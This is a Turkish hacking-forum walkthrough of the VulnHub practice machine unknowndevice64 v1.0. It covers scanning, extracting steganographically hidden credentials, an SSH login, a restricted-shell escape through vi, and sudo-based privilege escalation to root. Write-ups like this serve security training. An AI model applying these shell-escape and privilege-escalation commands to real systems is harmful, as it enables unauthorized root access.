unknowndevice64 v1.0 VulnHub Zafiyetli Makine Çözümü // Xowly

Xowly

Katılımcı Üye
17 Haz 2019
769
57
ғate
unknowndevice64 v1.0: VulnHub


Merhabalar, değerli Türk Hack Team ailesi bu gün sizlere "unknowndevice64 v2.0: VulnHub Zafiyetli Makine Çözümü" konusunu anlatacağım.


O38HH3.png



unknowndevice64-v1.0



byKAVa.png




İsim: unknowndevice64 v1.0: VulnHub

Çıkış Tarihi: 9 Mar 2019

Zorluk: Başlangıç

Dosya Boyutu: 282-mb/280-mb

Açıklama: "Root Erişimini Almak"

Hedef: flag.txt

Seri: unkowndevice64



6efAc8.gif





unknowndevice64 v1.0 Zafiyetli Makine Çözümü



Öncelikle zafiyetli makinemizin ip adresini öğrenebilmek için terminale netdiscover yazıyoruz.


xRGb93.jpg




Ardından nmap ile tarama yapıyoruz ve sonucunda iki adet "1337 ve 31337" portlarının açık olduğunu görüyoruz.


Kod:
nmap -A 192.168.204.129

K7a6dd.jpg




Ardından "31337" portu üzerinden anasayfamıza bir göz atıyoruz.


fPNzSb.jpg




Ardından anasayfamızda "h1dd3n" kelimemizin gizlendiğini görüyoruz. Ardından sayfamızın kaynak kodlarına göz atıyoruz.


4LMMc3.jpg





Ardından kaynak kodlarında bulduğumuz "key_is_h1dd3n.jpg" dosyasını tarayıcımızda açıyoruz.

Daha sonrasında bilgisayarımıza bu resim dosyasını kaydediyoruz.


AM82MP.jpg




Ardından dosyayı kaydettiğimiz konuma geçiyoruz ve ve aşağıdaki kodu terminalimize yazıyoruz.

Kod:
steghide extract -sf key_is_h1dd3n.jpg

BPLy5O.jpg




Ardından karşımıza bir metin dosyası çıkıyor. Aşağıdaki kod ile dosyayı okuyoruz ve çıkan metini dönüştürücüye atıyoruz.

Kod:
cat h1dd3n.txt

4IGKd2.jpg




Ardından kullanıcı adımız ve şifremiz karşımıza çıkıyor.

Kod:
Username: ud64
Password: 1M!#64@ud

5y6IbS.jpg



Ardından makinemize 1337 portu ile giriş yapıyoruz ve aşağıdaki komutları yazıyoruz.

Kod:
ssh [email protected] -p 1337

6Qz224.jpg




Daha sonrasında sırasıyla "id, ls, echo $SHELL, echo $PATH, export SHELL=/bin/bash:$SHEL, export PATH=/usr/bin:$PATH" yazıyoruz.

Kod:
id

Id2K0J.jpg




Kod:
ls

Kod:
echo $SHELL

ULVJTN.jpg



Kod:
echo $PATH

Kod:
export SHELL=/bin/bash:$SHEL

CNT1z1.jpg



Kod:
export PATH=/usr/bin:$PATH

cdxU5e.jpg




Ardından terminale "vi" yazıyoruz.

Kod:
vi


4NU9CC.jpg




Ardından gelen sayfada gerekli kısıma giriş yapmak için aşağıdaki kodu giriyoruz.

Kod:
:!/bin/bash

NO9VfI.jpg




Ardından gerekli komutları yazıyoruz ve "su" izni olmadan giriş yapabileceğimizi öğreniyoruz.

Kod:
export PATH=/usr/bin:$PATH

Kod:
export SHELL=/bin/bash:$SHELL
sudo -l

RbQ4WU.jpg




Ardından sudo ile aşağıdaki kodu çalıştırıyoruz.

Kod:
sudo sysud64 -h | less

616eR7.jpg




Ardından "sh" içerisinden çalıştırmamız gereken satırlar olduğundan dolayı aşağıdaki komutu yazıyoruz.

Kod:
sudo sysud64 -o /dev/null /bin/sh

a2VWfB.jpg




Ardından sırasıyla "id, ls, cd /root, ls" yazıyoruz. Ardından flag dosyamız karşımıza çıkıyor. Dosyamızı aşağıdaki komutla okuyoruz.

Kod:
cat flag.txt

cP4IMS.jpg





Evet Türk Hack Team ailesi konum bu kadar. Bir sonraki konumda görüşmek üzere. Esenlikler.



697LKG.gif
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.